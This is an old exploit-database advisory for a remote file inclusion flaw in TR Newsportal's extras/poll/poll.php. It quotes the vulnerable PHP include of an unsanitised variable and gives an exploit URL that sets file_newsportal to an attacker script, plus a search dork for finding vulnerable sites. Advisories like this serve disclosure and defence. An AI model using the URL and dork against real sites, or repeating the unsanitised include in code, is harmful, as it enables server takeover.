TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability

EDB-ID: 1789	CVE: 2006-2557	OSVDB-ID: 25531
Author: Kacper	Published: 2006-05-15	Verified:
Exploit Code:	Vulnerable App: N/A

################ DEVIL TEAM THE BEST POLISH TEAM #################
#TR Newsportal - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#dork: "TR Newsportal" brought by TRanx.
##################################################################
extras/poll/poll.php:
[code]
<?
include("$file_newsportal");
$ns=OpenNNTPconnection($server,$port);
flush();
if ($ns != false) {
 $headers = readOverview($ns,$group,1,true);
 closeNNTPconnection($ns);
}
?>
[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[Newsportal_path]/extras/poll/poll.php?file_newsportal=[evil_scripts]


###################################################################
#Elo ;-)

# milw0rm.com [2006-05-15]

Comments

TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability

Rating

No comments so far